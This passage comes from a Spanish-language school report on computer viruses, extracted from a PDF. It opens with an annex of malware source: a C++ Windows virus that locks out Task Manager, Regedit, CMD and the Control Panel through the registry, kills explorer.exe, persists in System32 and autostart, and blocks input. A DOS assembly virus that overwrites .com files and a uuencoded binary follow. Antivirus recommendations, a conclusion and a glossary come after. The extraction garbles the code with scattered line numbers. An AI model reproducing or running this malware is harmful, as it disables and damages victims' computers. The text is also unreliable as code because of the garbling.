Memory Leak 110 111 112 113 114 115 void Bloquear(char* Aplicacion) { /* Funcion para Bloquear el Simbolo del Sistema, Administrador de Tareas,Editor de registro (Regedit), }

27

116 117 118 119 120 121 122 123 124

Panel de control y eliminar Panel de Control y Ejecutar del menu de Incio de windows*/ try { HKEY hHKCU = NULL, hMyKey = NULL; DWORD value = 1; if (Aplicacion=="DisableCMD") { if (RegOpenKeyEx(HKEY_CURRENT_USER, NULL, 0, KEY_WRITE, &hHKC

U) == ERROR_SUCCESS) 125 126 { if (RegCreateKeyEx(hHKCU, "SoftwarePoliciesMicrosoftWindowsSy

stem", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS ) 127 128 { RegSetValueEx(hMyKey, Aplicacion, 0, REG_DWORD,(BYTE*)&value,

sizeof(DWORD)); 129 130 131 132 133 134 135 136 } } if (Aplicacion=="DisableTaskMgr") { if (RegOpenKeyEx(HKEY_CURRENT_USER, NULL, 0, KEY_WRITE, &hHKC RegCloseKey(hMyKey); }

28

U) == ERROR_SUCCESS) 137 138 { if (RegCreateKeyEx(hHKCU, "SoftwareMicrosoftWindowsCurrentVer

sionPoliciesSystem", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS) 139 140 { RegSetValueEx(hMyKey, Aplicacion, 0, REG_DWORD,(BYTE*)&value,

sizeof(DWORD)); 141 142 143 144 145 146 147 148 } } if (Aplicacion=="DisableRegistryTools") { if (RegOpenKeyEx(HKEY_CURRENT_USER, NULL, 0, KEY_WRITE, &hHKC RegCloseKey(hMyKey); }

U) == ERROR_SUCCESS) 149 150 { if (RegCreateKeyEx(hHKCU, "SoftwareMicrosoftWindowsCurrentVer

sionPoliciesSystem", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS) 151 152 { RegSetValueEx(hMyKey, Aplicacion, 0, REG_DWORD,(BYTE*)&value,

sizeof(DWORD)); 153 RegCloseKey(hMyKey);

29

154 155 156 157 158 159 160

} } if (Aplicacion=="NoControlPanel") { if (RegOpenKeyEx(HKEY_CURRENT_USER, NULL, 0, KEY_WRITE, &hHKC

U) == ERROR_SUCCESS) 161 162 { if (RegCreateKeyEx(hHKCU, "SoftwareMicrosoftWindowsCurrentVer

sionPoliciesExplorer", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS) 163 164 { RegSetValueEx(hMyKey, Aplicacion, 0, REG_DWORD,(BYTE*)&value,

sizeof(DWORD)); 165 166 167 168 169 } if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, NULL, 0, KEY_WRITE, &hHK RegCloseKey(hMyKey); }

CU) == ERROR_SUCCESS) 170 171 { if (RegCreateKeyEx(hHKCU, "SoftwareMicrosoftWindowsCurrentVer

sionPoliciesExplorer", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS)

30

172 173

{ RegSetValueEx(hMyKey, Aplicacion, 0, REG_DWORD,(BYTE*)&value,

sizeof(DWORD)); 174 175 176 177 178 179 180 181 } } if (Aplicacion=="NoRun") { if (RegOpenKeyEx(HKEY_CURRENT_USER, NULL, 0, KEY_WRITE, &hHKC RegCloseKey(hMyKey); }

U) == ERROR_SUCCESS) 182 183 { if (RegCreateKeyEx(hHKCU, "SoftwareMicrosoftWindowsCurrentVer

sionPoliciesExplorer", 0, NULL, 0, KEY_WRITE, NULL, &hMyKey, NULL) == ERROR_SUCCESS) 184 185 { RegSetValueEx(hMyKey, Aplicacion, 0, REG_DWORD,(BYTE*)&value,

sizeof(DWORD)); 186 187 188 189 190 191 } } }//fin try RegCloseKey(hMyKey); }

31

192 193 194

catch (...) { MessageBox (0,"Error el valor no pudo ser agregado","Error al

intentar agregar valor",MB_OK|MB_ICONERROR); 195 196 197 198 199 200 201 202 203 bool Infectado() { /*comprueba si el virus ha infectado el registro de manera que comprueba que todas la aplicaciones mencionadas en la funcion Bloquear() ya esten bloqueadas esto con el fin de evitar que puedan recuperar el control de estas aplica } }

ciones 204 con 205 206 207 208 209 210 leto 211 212 //Comprueba que ya haya bloqueado el CMD if(RegOpenKeyEx(HKEY_CURRENT_USER,"SoftwarePoliciesMicrosoftW algun metodo el virus las vuelva a crear. */ char cadena[256]; DWORD cadena2 = sizeof(cadena); HKEY onRegedit; //Comprueba que el virus haya contamidado el sistema por comp es decir en caso de que algun "listillo" borrara las entradas

32

indowsSystem",0,KEY_QUERY_VALUE,&onRegedit)) 213 {//Si no se abre la clave devolver false para indicar que no

existe 214 215 216 return false; } ZeroMemory(cadena,cadena2);//Pone en 0 ambas cadenas y le da

el tipo DWORD a cadena 217 if(RegQueryValueEx(onRegedit,"DisableCMD",0,NULL,(PBYTE)caden

a,&cadena2)) 218 219 220 {//si esta infectado cadena guarda el valor alfanumerico RegCloseKey(onRegedit); return false;//Devolver false porque aun no esta infectado el

registro 221 222 223 224 225 } else { RegCloseKey(onRegedit); return true;//Se devuelve true porque el registro ya esta inf

ectado 226 227 228 229 //Comprueba que taskmgr y regedit esten bloqueados if(RegOpenKeyEx(HKEY_CURRENT_USER,"SoftwareMicrosoftWindowsCu }

rrentVersionPoliciesSystem",0,KEY_QUERY_VALUE,&onRegedit)) 230 {

33

231 232 233 234

return false; } ZeroMemory(cadena,cadena2); if((RegQueryValueEx(onRegedit,"DisableTaskMgr",0,NULL,(PBYTE)

cadena,&cadena2))||(RegQueryValueEx(onRegedit,"DisableRegistryTools ",0,NULL,(PBYTE)cadena,&cadena2))) 235 236 237 238 239 240 241 242 { RegCloseKey(onRegedit); return false; } else { RegCloseKey(onRegedit); return true;//Se devuelve true porque el registro ya esta inf

ectado 243 244 245 //Comprueba que panel de control este bloqueado y que no este }

en el menu de Inicio 246 if((RegOpenKeyEx(HKEY_CURRENT_USER,"SoftwareMicrosoftWindowsC

urrentVersionPoliciesExplorer",0,KEY_QUERY_VALUE,&onRegedit))||(Reg OpenKeyEx(HKEY_LOCAL_MACHINE,"SoftwareMicrosoftWindowsCurrentVersio nPoliciesExplorer",0,KEY_QUERY_VALUE,&onRegedit))) 247 248 { return false;

34

249 250 251

} ZeroMemory(cadena,cadena2); if((RegQueryValueEx(onRegedit,"NoControlPanel",0,NULL,(PBYTE)

cadena,&cadena2))||(RegQueryValueEx(onRegedit,"NoControlPanel",0,NU LL,(PBYTE)cadena,&cadena2))) 252 253 254 255 256 257 258 259 { RegCloseKey(onRegedit); return false; } else { RegCloseKey(onRegedit); return true;//Se devuelve true porque el registro ya esta inf

ectado 260 261 262 263 //Comprueba que Ejecutar no este en el menu de Inicio if(RegOpenKeyEx(HKEY_CURRENT_USER,"SoftwareMicrosoftWindowsCu }

rrentVersionPoliciesExplorer",0,KEY_QUERY_VALUE,&onRegedit)) 264 265 266 267 268 { return false; } ZeroMemory(cadena,cadena2); if(RegQueryValueEx(onRegedit,"NoRun",0,NULL,(PBYTE)cadena,&ca

dena2))

35

269 270 271 272 273 274 275 276

{ RegCloseKey(onRegedit); return false; } else { RegCloseKey(onRegedit); return true;//Se devuelve true porque el registro ya esta inf

ectado 277 278 279 280 281 282 283 284 285 int main() { /*En la primera Ejecucion no bloquea el mouse y tampoco produce el Memory Leak*/ FreeConsole(); hackoKillsExplorerOfBillGates(explorerEnd); //Finaliza el pro } }

ceso explorer.exe 286 287 288 289 290 291 VirusCopy(); //Se copia a C:windowsSystem32 if (Infectado()==false) { Bloquear (die1); Bloquear (die2); Bloquear (die3);

36

292 293 294 dows 295 296 297 298 dows 299

Bloquear (die4); Bloquear (die5); VirusOnRegedit(); //Se copia al registro para iniciar con win

} else { VirusOnRegedit(); //Se copia al registro para iniciar con win

MessageBox (0,"El mouse y el teclado seran bloqueados...n Bl

oquear?","Windows - Que hago?",MB_YESNO|MB_ICONEXCLAMATION); 300 MessageBox (0,"Ahora viene un Memory Leak!!!n Virus creado po

r ph3nn0m ,"Virus Blocked by: ph3nn0m",MB_OK|MB_ICONEXCLAMATION); 301 302 303 304 305 306 NoInputStupid(); //Bloquea El teclado y el Mouse MemoryLeak(); } return 0; } </stdio.h></tlhelp32.h></winable.h></windows.h>

codigo segment byte public assume cs:codigo, ds:codigo org 100h vmini proc far start: mov ah,1Ah mov dx,offset dta int 21h ;pongo DTA en dta mov ah,4Eh mov dx,offset nombre

37

mov cx,26h int 21h ; DOS Services ah=function 4Eh ; find 1st filename match @ds:dx jc short adios ; Jump if carry Set mov ah,41h mov dx,offset dta + 1eh int 21h ; borro el archivo .com mov ah,3Ch mov cx,0 mov dx,offset dta + 1eh int 21h ; ; create file, cx=attributos, name@ds:dx jc short adios ; Jump if carry Set mov cx, offset fin - 100h mov dx,100h xchg ax,bx ; BX = Handle mov ah,40h int 21h ; DOS Services ah=function 40h ; write file cx=bytes, from ds:dx adios: mov ah,4Ch ; Terminar el programa con close files int 21h dta: db 43 dup (0) nombre: db '*.com', 0 fin: vmini endp codigo ends end start begin 775 102.com MM!JZ-0'-(;1.NF`!N28`S2%R'K1!NE,!S2&T/+D``+I3`<TA<@NY9@"Z``&3 MM$#-(;1,S2$````````````````````````````````````````````````` ,````````*BYC;VT` ` end

38

39

IMGENES

40

41

CRONOGRAMA

FECHA 28/08/11 30/08/11 01/09/11 03/09/11 04/09/11 05/09/11

ACTIVIDAD Eleccin del tema realizacin de la introduccin y los objetivos Se trabajo en el marco Terico Terminacin del Marco Terico Anexos Revisin y Correccin de Detalles

42

RECOMENDACIONES En razn de lo expresado pueden extraerse algunos conceptos que pueden considerarse necesarios para tener en cuenta en materia de virus informticos:

No todo lo que afecte el normal funcionamiento de una computadora es un virus. TODO virus es un programa y, como tal, debe ser ejecutado para activarse. Es imprescindible contar con herramientas de deteccin y desinfeccin. NINGN sistema de seguridad es 100% seguro. Por eso todo usuario de computadoras debera tratar de implementar estrategias de seguridad antivirus, no slo para proteger su propia informacin sino para no convertirse en un agente de dispersin de algo que puede producir daos graves e indiscriminados.

Para implementar tales estrategias deberan tenerse a mano los siguientes elementos:

UN DISCO DE SISTEMA PROTEGIDO CONTRA ESCRITURA Y LIBRE DE VIRUS: Un disco que contenga el sistema operativo ejecutable (es decir, que la mquina pueda ser arrancada desde este disco) con proteccin contra escritura y que contenga, por lo menos, los siguientes comandos: FORMAT, FDISK, MEM y CHKDSK (o SCANDISK en versiones recientes del MS-DOS). POR LO MENOS UN PROGRAMA ANTIVIRUS ACTUALIZADO: Se puede considerar actualizado a un antivirus que no tiene ms de tres meses desde su fecha de creacin (o de actualizacin del archivo de strings). Es muy recomendable tener por lo menos dos antivirus. UNA FUENTE DE INFORMACIN SOBRE VIRUS ESPECFICOS: Es decir, algn programa, libro o archivo de texto que contenga ladescripcin, sntomas y caractersticas de por lo menos los cien virus ms comunes. UN PROGRAMA DE RESPALDO DE REAS CRTICAS: Algn programa que obtenga respaldo (backup) de los sectores de arranque de los disquetes y sectores de arranque maestro (MBR, Master Boot Record) de los discos rgidos. Muchos programas antivirus incluyen funciones de este tipo. LISTA DE LUGARES DNDE ACUDIR: Una buena precaucin es no esperar a necesitar ayuda para comenzar a buscar quin puede ofrecerla, sino ir elaborando una agenda de direcciones, telfonos y direcciones electrnicas de las personas y lugares que puedan servirnos ms adelante. Si se cuenta con un antivirus comercial o registrado, debern tenerse siempre a mano los telfonos de soporte tcnico. UN SISTEMA DE PROTECCIN RESIDENTE: Muchos antivirus incluyen programas residentes que previenen (en cierta medida), la intrusin de virus y programas desconocidos a la computadora.

43

TENER RESPALDOS: Se deben tener respaldados en disco los archivos de datos ms importantes, adems, se recomienda respaldar todos los archivos ejecutables. Para archivos muy importantes, es bueno tener un respaldo doble, por si uno de los discos de respaldo se daa. Los respaldos tambin pueden hacerse en cinta (tape backup), aunque para el usuario normal es preferible hacerlo en discos, por el costo que las unidades de cinta representan. REVISAR TODOS LOS DISCOS NUEVOS ANTES DE UTILIZARLOS: Cualquier disco que no haya sido previamente utilizado debe ser revisado, inclusive los programas originales (pocas veces sucede que se distribuyan discos de programas originales infectados, pero es factible) y los que se distribuyen junto con revistas de computacin. REVISAR TODOS LOS DISCOS QUE SE HAYAN PRESTADO: Cualquier disco que se haya prestado a algn amigo o compaero de trabajo, an aquellos que slo contengan archivos de datos, deben ser revisados antes de usarse nuevamente. REVISAR TODOS LOS PROGRAMAS QUE SE OBTENGAN POR MDEM O REDES: Una de las grandes vas de contagio la constituyen Internet y los BBS, sistemas en los cuales es comn la transferencia de archivos, pero no siempre se sabe desde dnde se est recibiendo informacin. REVISAR PERIDICAMENTE LA COMPUTADORA: Se puede considerar que una buena frecuencia de anlisis es, por lo menos, mensual.

Finalmente, es importante tener en cuenta estas sugerencias referentes al comportamiento a tener en cuenta frente a diferentes situaciones:

Cuando se va a revisar o desinfectar una computadora, es conveniente apagarla por ms de 5 segundos y arrancar desde un disco con sistema, libre de virus y protegido contra escritura, para eliminar virus residentes en memoria. No se deber ejecutar ningn programa del disco rgido, sino que el antivirus deber estar en el disquete. De esta manera, existe la posibilidad de detectar virus stealth. Cuando un sector de arranque (boot sector) o de arranque maestro (MBR) ha sido infectado, es preferible restaurar el sector desde algn respaldo, puesto que en ocasiones, los sectores de arranque genricos utilizados por los antivirus no son perfectamente compatibles con el sistema operativo instalado. Adems, los virus no siempre dejan un respaldo del sector original donde el antivirus espera encontrarlo. Antes de restaurar los respaldos es importante no olvidar apagar la computadora por ms de cinco segundos y arrancar desde el disco libre de virus. Cuando se encuentran archivos infectados, es preferible borrarlos y restaurarlos desde respaldos, an cuando el programa antivirus que usemos pueda desinfectar los archivos. Esto es porque no existe seguridad sobre si el virus detectado es el mismo para el cual fueron diseadas las rutinas de desinfeccin del antivirus, o es una mutacin del original.

44

Cuando se va a formatear un disco rgido para eliminar algn virus, debe recordarse apagar la mquina por ms de cinco segundos y posteriormente arrancar el sistema desde nuestro disquete limpio, donde tambin debe encontrarse el programa que se utilizar para dar formato al disco. Cuando, por alguna causa, no se puede erradicar un virus, deber buscarse la asesora de un experto directamente pues, si se pidiera ayuda a cualquier aficionado, se correr el riesgo de perder definitivamente datos si el procedimiento sugerido no es correcto. Cuando se ha detectado y erradicado un virus es conveniente reportar la infeccin a algn experto, grupo de investigadores de virus, soporte tcnico de programas antivirus, etc. Esto que en principio parecera innecesario, ayuda a mantener estadsticas, rastrear focos de infeccin e identificar nuevos virus, lo cual en definitiva, termina beneficiando al usuario mismo.

45

CONCLUSION: Despus de haber ledo cuidadosamente cada una de las funciones, caractersticas, modos de propagacin y mtodos de los virus podemos afirmar que su nica tarea es daar nuestros archivos almacenados en nuestros medios de almacenamientos. Por lo cual estaramos condenados a tratar de vivir recuperando lo que con mucho sacrificio durante das meses y aos hemos estado guardando en nuestros medios de almacenamientos masivos (discos duros, USB, DVD, CD, etc) de manera que tenemos que estar al tanto de ellos (los virus). Ya que a pesar de ser peligrosos para nuestro sistema operativo y para nuestros ficheros tambin existe la manera de mantener los virus alejados de nuestros ordenadores.

46

GLOSARIO Booteo: Bootear se refiere a modificar el orden de arranque de tus


dispositivos almacenamiento (DVD, CD, Disco Duro, Disquets, etc).

Software: Programas y Aplicaciones que posee una PC

BIOS: significa Sistema bsico de entrada y salida. El BIOS es un


programa incorporado en su equipo que controla la comunicacin entre todos los dispositivos de entrada y salida (tales como unidades de disco, pantallas, teclados, mouse, e impresoras). La configuracin BIOS se almacena en un chip en la placa base.

Flotando: Mantenerse en suspensin un cuerpo en un medio gaseoso: el humo flotaba en la habitacin.

Subrepticio: adj. Que se hace ocultamente o a escondidas: Encriptados: La encriptacin es el proceso para volver ilegible
informacin considera importante. La informacin una vez encriptada slo puede leerse aplicndole una clave.

Polimrficos: Bsica Es la tcnica que utilizan algunos virus para cifrar


(codificar) su firma de forma diferente en cada ocasin y adems las instrucciones para realizar dicho cifrado.

Camuflarse: m. Estrategia militar que consiste en hacer pasar inadvertidas las tropas y el material blico dndoles apariencia distinta de la real: a los cascos de camuflaje se les suelen pegar hojas y ramas.

FAT: Tabla de Ubicacin de Archivos

47

BIBLIOGRAFIA

http://www.seguridadpc.net/elimina_virus.htm.

http://www.taringa.net/posts/ebooks-tutoriales/5150719/Limpia-Virusmas-Problematicos.html.

http://manuales.maxitrucos.com/

Diccionario Larrouce Jimnez Hernndez Miguel: La Biblia de la Computadora- 2da Edicin/Editorial Orix.

48

You might also like